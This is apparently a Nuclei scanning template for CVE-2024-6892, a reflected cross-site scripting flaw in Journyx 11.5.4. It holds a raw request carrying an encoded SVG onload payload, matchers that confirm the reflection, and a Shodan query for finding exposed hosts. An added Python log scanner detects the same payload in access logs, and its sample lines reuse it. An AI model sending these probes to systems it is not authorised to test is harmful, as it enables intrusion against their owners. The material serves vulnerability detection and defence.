Vulnerability Description
Attackers can craft a malicious link that once clicked will execute arbitrary JavaScript in the context of the Journyx web application.
id: CVE-2024-6892
info:
  name: Journyx 11.5.4 - Reflected Cross Site Scripting
  author: DhiyaneshDk
  severity: medium
  description: |
    Attackers can craft a malicious link that once clicked will execute arbitrary JavaScript in the context of the Journyx web application.
  reference:
    - https://korelogic.com/Resources/Advisories/KL-001-2024-009.txt
    - http://seclists.org/fulldisclosure/2024/Aug/7
    - https://github.com/fkie-cad/nvd-json-data-feeds
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-6892
    cwe-id: CWE-81,CWE-79
    epss-score: 0.03819
    epss-percentile: 0.87695
    cpe: cpe:2.3:a:journyx:journyx:11.5.4:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: journyx
    product: journyx
    shodan-query: html:"Journyx"
  tags: cve,cve2024,xss,journyx,seclists
http:
  - raw:
      - |
        GET /jtcgi/r/adlogin/sso?code=1337&state=foobar&id_token=zoinks&error_description=%3Csvg%2fonload%3dprompt(%27document.domain%27)%3E&error=error HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<P>error <B><svg/onload=prompt('document.domain')></B></P>"
          - "journyx"
        condition: and
        case-insensitive: true
      - type: word
        part: content_type
        words:
          - "text/html"
# digest: 4b0a00483046022100828e6d086641382d11661b77a88ddfb8cd87c4806303cf0e35b55b7ef890b7d4022100ea5af78522801c9ac0337b301c0f0b05133fe4f43152660c05227fdc8e92cf9c:922c64590222798bb761d5b6d8e72950
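
A defender-side check built from the request and matcher in the template above, added here as an example (it is not part of the original template or of Journyx): it scans web access logs for requests to the SSO endpoint whose `error_description` parameter decodes to HTML markup. The combined-log line layout, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Endpoint and parameter taken from the template's request line.
SSO_PATH = "/jtcgi/r/adlogin/sso"
REFLECTED_PARAM = "error_description"
# The matcher shows the value landing inside <B>...</B> element content,
# so an angle bracket is what turns the message into markup.
MARKUP = re.compile(r"[<>]")
# Assumed log layout: request line quoted as in the common/combined format.
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def suspicious_values(log_line):
    """Return decoded error_description values in one log line that carry markup."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if url.path.rstrip("/") != SSO_PATH:
        return []
    hits = []
    for value in parse_qs(url.query, keep_blank_values=True).get(REFLECTED_PARAM, []):
        # parse_qs decodes once; decode again to catch double-encoded input.
        decoded = unquote(value)
        if MARKUP.search(decoded):
            hits.append(decoded)
    return hits

def scan(lines):
    """Return (line_number, values) for every log line worth reviewing."""
    findings = []
    for number, line in enumerate(lines, start=1):
        values = suspicious_values(line)
        if values:
            findings.append((number, values))
    return findings

# Constructed sample log lines (documentation IP ranges, invented timestamps).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Sep/2024:10:00:00 +0000] "GET /jtcgi/r/adlogin/sso?code=abc&state=xyz HTTP/1.1" 302 0',
    '203.0.113.9 - - [01/Sep/2024:10:00:05 +0000] "GET /jtcgi/r/adlogin/sso?error=access_denied&error_description=User+cancelled+sign-in HTTP/1.1" 200 512',
    '198.51.100.4 - - [01/Sep/2024:10:01:00 +0000] "GET /jtcgi/r/adlogin/sso?error=error&error_description=%3Csvg%2fonload%3dprompt(%27document.domain%27)%3E HTTP/1.1" 200 640',
    '198.51.100.4 - - [01/Sep/2024:10:01:09 +0000] "GET /jtcgi/r/adlogin/sso?error=error&error_description=%253Cb%253Etest%253C%252Fb%253E HTTP/1.1" 200 640',
]

if __name__ == "__main__":
    for number, values in scan(SAMPLE_LOG):
        print(f"line {number}: {values}")
```

A hit means the request carried markup in the reflected parameter, not that it executed; whether the response echoed it unescaped depends on the installed Journyx version.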